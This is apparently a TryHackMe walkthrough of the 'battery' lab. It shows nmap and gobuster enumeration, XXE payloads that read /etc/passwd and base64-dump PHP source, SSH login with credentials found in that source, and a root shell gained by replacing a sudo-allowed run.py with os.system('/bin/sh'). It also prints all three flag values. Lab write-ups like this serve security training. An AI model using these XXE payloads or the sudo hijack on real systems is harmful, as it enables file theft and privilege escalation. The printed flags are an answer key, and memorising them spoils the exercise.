battery

 Tryhackme - battery

NMAP

# nmap -sT -vv -sC -sV 10.10.21.189 

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 14:6b:67:4c:1e:89:eb:cd:47:a2:40:6f:5f:5c:8c:c2 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAPe2PVDHBBlUCEtHNVxjToY/muZpZ4hrISDM7fuGOkh/Lp9gAwpEh24Y/u197WBDTihDJsDZJqrJEJSWbpiZgReyh1LtJTt3ag8GrUUDJCNx6lLUIWR5iukdpF7A2EvV4gFn7PqbmJmeeQRtB+vZJSp6VcjEG0wYOcRw2Z6N6ho3AAAAFQCg45+RiUGvOP0QLD6PPtrMfuzdQQAAAIEAxCPXZB4BiX72mJkKcVJPkqBkL3t+KkkbDCtICWi3d88rOqPAD3yRTKEsASHqSYfs6PrKBd50tVYgeL+ss9bP8liojOI7nP0WQzY2Zz+lfPa+d0uzGPcUk0Wg3EyLLrZXipUg0zhPjcXtxW9+/H1YlnIFoz8i/WWJCVaUTIR3JOoAAACBAMJ7OenvwoThUw9ynqpSoTPKYzYlM6OozdgU9d7R4XXgFXXLXrlL0Fb+w7TT4PwCQO1xJcWp5xJHi9QmXnkTvi386RQJRJyI9l5kM3E2TRWCpMMQVHya5L6PfWKf08RYGp0r3QkQKsG1WlvMxzLCRsnaVBqCLasgcabxY7w6e2EM
|   2048 66:42:f7:91:e4:7b:c6:7e:47:17:c6:27:a7:bc:6e:73 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkDLTds2sLmn9AZ0KAl70Fu5gfx5T6MDJehrsCzWR3nIVczHLHFVP+jXDzCcB075jjXbb+6IYFOdJiqgnv6SFxk85kttdvGs/dnmJ9/btJMgqJI0agbWvMYlXrOSN26Db3ziUGrddEjTT74Z1kokg8d7uzutsfZjxxCn0q75NDfDpNNMLlstOEfMX/HtOUaLQ47IeuSpaQoUkNkHF2SGoTTpbC+avzcCNHRIZEwQ6HdA3vz1OY6TnpAk8Gu6st9XoDGblGt7xv1vyt0qUdIYaKib8ZJQyj1vb+SJx6dCljix4yDX+hbtyKn08/tRfNeRhVSIIymOTxSGzBru2mUiO5
|   256 a8:6a:92:ca:12:af:85:42:e4:9c:2b:0e:b5:fb:a8:8b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCYHRWUDqeSQgon8sLFyvLMQygCx01yXZR6kxiT/DnZU+3x6QmTUir0HaiwM/n3aAV7eGigds0GPBEVpmnw6iu4=
|   256 62:e4:a3:f6:c6:19:ad:30:0a:30:a1:eb:4a:d3:12:d3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILW7vyhbG1WLLhSEDM0dPxFisUrf7jXiYWNSTqw6Exri
80/tcp open  http    syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

HERE, port 22,80 are open.

 

Enumeration

run gobuster you get all directory here..)

 #gobuster dir -u http://10.10.21.189  -w /usr/share/dirb/wordlists /common.txt -x txt,php

/acc.php              (Status: 200) [Size: 1104]
/admin.php            (Status: 200) [Size: 663]
/admin.php            (Status: 200) [Size: 663]
/dashboard.php        (Status: 302) [Size: 908] [--> admin.php]
/forms.php            (Status: 200) [Size: 2334]              
/index.html           (Status: 200) [Size: 406]               
/logout.php           (Status: 302) [Size: 0] [--> admin.php] 
/register.php         (Status: 200) [Size: 715]               
/report               (Status: 200) [Size: 16912]             
/scripts              (Status: 301) [Size: 313] [--> http://10.10.21.189/scripts/]
/server-status        (Status: 403) [Size: 292]                                  
/with.php             (Status: 302) [Size: 1259] [--> admin.php]                 

 

lets,check .. /register.php 

 

 

let's,try to login ..

 

 Here is the dashboard view..

 

FILE

we can’t access the my account and command menu though. Let’s try to check the /report file.

 

 let's command on terminal ...

#strings report 

support@bank.a
contact@bank.a
cyber@bank.a
admins@bank.a
sam@bank.a
admin0@bank.a
super_user@bank.a
control_admin@bank.a
it_admin@bank.a
Welcome To ABC DEF Bank Managemet System!

let's check ...command page..

<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>
aaa
</name>
<search>
test
</search>
</root>

then, we use xml payload check here - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

 

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE replace [<!ENTITY test SYSTEM "file:///etc/passwd"> ]>

 

<root>

  <name>

    aaa

  </name>

  <search>

    &test;

  </search>

</root>

 

 

Here, i try to read the /acc.php source code.

<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/register.php" >

you can see here this type of encoder..

let's,try hash for encoding will get for password.

#echo "base64EncodedString" | base64 -d >> output.php

session_start();
if(isset($_SESSION['favcolor']) and $_SESSION['favcolor']==="admin@bank.a")
{

echo "<h3 style='text-align:center;'>Weclome to Account control panel</h3>";
echo "<form method='POST'>";
echo "<input type='text' placeholder='Account number' name='acno'>";
echo "<br><br><br>";
echo "<input type='text' placeholder='Message' name='msg'>";
echo "<input type='submit' value='Send' name='btn'>";
echo "</form>";
//MY CREDS :- cyber:super#secure&password!




user flag1.


# ssh cyber@10.10.133.60   

cyber@ubuntu:~$ id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
cyber@ubuntu:~$ ls
flag1.txt  run.py
cyber@ubuntu:~$ cat flag1.txt
THM{6f7e4dd134e19af144c88e4fe46c67ea} 

privilege escalation 

try, #sudo -l

cyber@ubuntu:~$ sudo -l
Matching Defaults entries for cyber on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cyber may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3 /home/cyber/run.py

 We can run /usr/bin/python3 /home/cyber/run.py as root

cyber@ubuntu:~$ mv run.py run2
cyber@ubuntu:~$ ls
flag1.txt  run2

cyber@ubuntu:~$ echo 'import os; os.system("/bin/sh")' > run.py 
cyber@ubuntu:~$ chmod +x run.py
cyber@ubuntu:~$ sudo /usr/bin/python3 /home/cyber/run.py
# whoami
root
# cd /root
# cat root.txt

THM{db12b4451d5e70e2a177880ecfe3428d} 

flag2.txt

# cd /home
# ls
cyber  yash
# cd cybr
/bin/sh: 6: cd: can't cd to cybr
# ls
cyber  yash
# cd yash
# ls
emergency.py  fernet  flag2.txt  root.txt
# cat flag2.txt
THM{20c1d18791a246001f5df7867d4e6bf5}
 

 

flags here..

base flag - THM{6f7e4dd134e19af144c88e4fe46c67ea}

user flag - THM{20c1d18791a246001f5df7867d4e6bf5}

root flag - THM{db12b4451d5e70e2a177880ecfe3428d}